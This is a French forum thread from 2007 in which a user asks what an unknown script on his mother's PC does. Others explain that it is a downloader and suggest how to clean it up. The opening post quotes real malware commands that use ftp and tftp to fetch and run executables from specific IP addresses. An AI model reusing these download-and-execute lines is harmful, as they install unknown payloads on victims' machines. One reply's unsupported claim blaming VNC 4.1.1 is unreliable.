Sur le pc de ma mère , je ne sais pas comment elle s'est débrouillée mais il y a un code qui se lance. Voici le code en question:

%systemroot%\system32\cmd.exe
cmd /c echo OPEN 82.236.88.19 19145>x&echo
cmd.exe /c del i&echo open 82.236.116.217 29711 > i&echo user 1 1 >> i &echo get 338.exe >> i &echo quit >> i &ftp -n -s:i &338.exe&del i&exit
%comspec% /c tftp -i 68.43.148.121 GET ubyrltni.exe & start ubyrltni

Sur le PCinfecté, j'ai passé:
Avast=rien
trend micro en ligne=rien
Ad-aware=rien
spybot=rien

Dans l'ordre il me reste un scan depuis un autre PC
le formatage et install.

Dans la mesure où ma mère n'utilise le pc qu'à des fins de courrier, ne gère pas ses comptes bancaire en ligne, ne fait pas de transaction en ligne, je me demande si vivre avec un parasite est génant d'où ma question:

Il faut quoi exactement ce code??

Euh... En gros, ça se connecte à un serveur FTP, ça y récupère un exécutable et ça l'exécute. Autrement dit, ça ressemble à un virus.
Un parasite est toujours gênant tant que tu ne sais pas exactement ce qu'il fait.

Ta mère ne gère peut-être pas ses comptes en ligne, mais elle envoie quand même des mots de passe pour le courrier. D'autre part, (je n'en sais mais) il se pourrait qu'il surveille ce qu'elle fait, ce qu'elle tape, bref, qu'il fasse des choses qu'un parasite fait et qu'on a pas forcément envie qu'il fasse.

Le mieux, pour commencer, serait probablement que tu désactives l'exécution de ce truc (un .bat, je suppose).

hello akai,

bon alors deja t'es pas du tout dans la bonne section

sinon, pour ton code, je trouve ca un peu grossier perso pour que ce soit l'oeuvre d'un vrai hacker, c'est meme plus que grossier...
en fait, deja les 2 urls que t'as, les ips ne ping pas, donc a priori ca risque pas de se connecter quelque part, je parle uniquement des 2 1eres ip. la 3eme ip elle ping, j'ai pas regarde en detail mais le fichier ubyrltni.exe est inconnu sur google, surement autre chose de masque. il faudrait que tu recherches sur ta machine si tu le trouves et que tu essayes de determiner ce que c'est ce truc...

ensuite, tu vas la dessus :
http://www.ipligence.com/geolocation/?lang=en&search#
et tu tapes ton ip (la 3eme), tu vas voir que le serveur est aux states, comme il est apparemment pas dans un paradis fiscal, tu devrais pouvoir facilement remonter jusqu'a l'hebergeur et te plaindre aupres lui via la classique adresse abuse_AT_machin.com

bref, pour moi ca ressemble plus a un test de gamin qui aurait voulu faire joujou, t'as pas une idee ??? genre pti frere, cousin, fausse bete de l'info en puissance

et pis comme te l'a dit pimoose juste au dessus, dans un premier temps, desactives l'execution de ce merdier, fais une recherche dans le registre pour trouver la cle qui lance ce truc, vire la et reboot, il faudra verifier que ca ne revient pas. si ca revient c'est qu'il y a une autre cochonnerie qui est planquee ailleurs et qui relance le process, docn la meme methode, va falloir traquer le registre pour trouver qui permet le fork du process initial et donc la re creation de ce bidule.

si tu as besoin de plus d'aide, n'hesites pas

ah, autre chose que tu peux essayer : y'a t'il plusieurs utilisateurs sur cette machine ? plusieurs comptes je veux dire ??? Si oui, connectes toi avec un autre compte et regarde si le probleme se reproduit. ca te donnera deja l'indice ou chercher dans le registre. si tu n'as ps d'autre compte, crees en un, un admin de preference, et tu regardes tu peux aussi rechercher les fichiers specifies dans le fameux script sur ta machine, dasn le registre, tu trouveras peut etre des traces de quelque chose.

et pour finir, vla le traceroute de la 3eme ip :
D‚termination de l'itin‚raire vers c-68-43-148-121.hsd1.mi.comcast.net [68.43.148.121]

avec un maximum de 30 sautsÿ:



1 * * * D‚lai d'attente de la demande d‚pass‚.

2 * * * D‚lai d'attente de la demande d‚pass‚.

3 38 ms 40 ms 38 ms 10.224.48.50

4 39 ms 39 ms 40 ms GE3-3-0-0.nrlyo302.Lyon.francetelecom.net [193.252.160.190]

5 47 ms 45 ms 45 ms pos12-0.ntsta302.Paris.francetelecom.net [193.252.103.110]

6 45 ms 45 ms 45 ms pos9-0.ntsta202.Paris.francetelecom.net [193.252.161.57]

7 45 ms 45 ms 45 ms 193.252.162.122

8 45 ms 44 ms 45 ms po13-0.pascr3.Paris.opentransit.net [193.251.129.62]

9 134 ms 135 ms 134 ms po14-0.ashcr1.Ashburn.opentransit.net [193.251.242.98]

10 123 ms 124 ms 124 ms gi9-0-0.ashcr2.Ashburn.opentransit.net [193.251.241.42]

11 138 ms 138 ms 138 ms so-6-0-0-0.atlcr1.Atlanta.opentransit.net [193.251.241.158]

12 139 ms 138 ms 137 ms att-1.GW.opentransit.net [193.251.247.62]

13 172 ms 172 ms 173 ms tbr2011101.attga.ip.att.net [12.123.20.206]

14 174 ms 174 ms 174 ms tbr2-cl29.sl9mo.ip.att.net [12.122.10.138]

15 176 ms 185 ms 176 ms tbr2-cl7.cgcil.ip.att.net [12.122.10.45]

16 174 ms 170 ms 171 ms gar4-p390.cgcil.ip.att.net [12.123.6.14]

17 178 ms 177 ms 177 ms 12.118.239.42

18 180 ms 180 ms 179 ms pos-2-1-ar02.pontiac.mi.michigan.comcast.net [68.87.191.166]

19 181 ms 180 ms 181 ms te-9-2-ur02.auburnhills.mi.michigan.comcast.net [68.87.191.29]

20 181 ms 180 ms 180 ms te-9-2-ur02.rochestrhlls.mi.michigan.comcast.net [68.87.191.25]

21 181 ms 180 ms 181 ms te-9-1-ur03.royaloak.mi.michigan.comcast.net [68.87.191.21]

22 181 ms 181 ms 181 ms te-9-2-ur02.royaloak.mi.michigan.comcast.net [68.87.191.17]

23 182 ms 182 ms 181 ms te-9-1-ur03.warren1.mi.michigan.comcast.net [68.87.191.13]

24 179 ms 180 ms 179 ms ge-6-2-ur02.warren1.mi.michigan.comcast.net [68.87.184.65]

25 183 ms 181 ms 182 ms ge-0-1-ubr01.warren1.mi.michigan.comcast.net [68.87.184.46]

26 184 ms 185 ms 184 ms c-68-43-148-121.hsd1.mi.comcast.net [68.43.148.121]

avec ca deja ca devrait t'avancer un peu.

++

Merci pour vos réponses . Je digère les infos vous donnerai un retour

Le 19 février 2007 - 08 h 52, grabber a écrit : ips ne ping pas, donc a priori ca risque pas de se connecter quelque part

ouille !! j'espère que ca ne veut pas dire ce que je crois !

petit rappel au passage: le ping est un service qui peut être soumis comme les autres à la configuration d'un firewall ou d'un nat.... en gros qu'une ip ne réponde pas au ping ne signifie absolument pas qu'il n'y a aucun autre service qui tourne... dans ce cas l'ip peut ne pas répondre au ping et avoir un service ftp opérationnel ^^

hello loading:) ca roule ?
hey dis donc tum prend vraiment pour une quiche toi !!!!!!
tu crois que g pas essaye de me connect sur le merdier ???
non mais dis donc

me oue jte confirme g mal tourne la phrase, g fait ca ce matin en arrivant vite fait

au fait, g teste avec les ports nommes ci dessus et par le 21, rien du tout

PS : cette petite remarque te vaudra de m'payer une mousse la prochaine fois !

lol pas de problème ^^ (je me disais aussi, pas grabber qd mm ! )

au fait t'as vu qu'il y a aussi un tftp, port 69 (udp)

Le 20 février 2007 - 10 h 03, Loading a écrit : lol pas de problème ^^ (je me disais aussi, pas grabber qd mm ! )

c ca mokque toi en plus

Le 20 février 2007 - 10 h 07, Loading a écrit : au fait t'as vu qu'il y a aussi un tftp, port 69 (udp)

non me dis donc !!! g pas l'temps non plus de me taper les ptis problemes de tout le monde hein ! y'en a qui bossent !!!

hey, t'en est a 3 mousses normal, 3 remarques 3 mousses

Salut

C'est a cause de Vnc Server que tu a du installer sur le Pc de ta mere .Il faut desinstaller cette saloperie de VNc 4.1.1 car c'est elle qui permet le lancement de script et la prise su controle de votre pc par les Hackers et reinstaller la derniere version 4.1.2 .Voila pour ceux qui sont dans la galere avec VNC .
p.s j'ai galere 1 semaine pour trouver car c'est juste une commande et pas un Malware ou rien qui peut etre detectée comme virus ou adware aucun antivirus ne detecte cela ni rien d'autre .
Si tu est aller demander sur d'aide sur d'autre forums copie et colle ma reponse pour aider les galeriens ça eviterais des nombreux Formatages .

Ah oui, faut faire super gaffe, depuis que j'ai installé winvnc 4.1.1, mon ordi ne répond plus, un bananier a poussé sur mon balcon et ma femme me trompe !

Euh... Ta volonté est sûrement très bonne, mais ça sort d'où, cette histoire de WinVNC ? Ce n'est pas comme s'il n'y avait qu'une seule version d'un seul logiciel qui présente un moyen d'accéder à une machine contre le gré de l'utilisateur.

Ou alors je suis complètement dans le champ ?

moi le truc que je pige pas c qu'un gus se créer un compte (vu le temps que ca prends quand mm) rien que pour poster ça... ? expliquez moi siouplai ^^

le poisson avait ptet 2 jours d'avance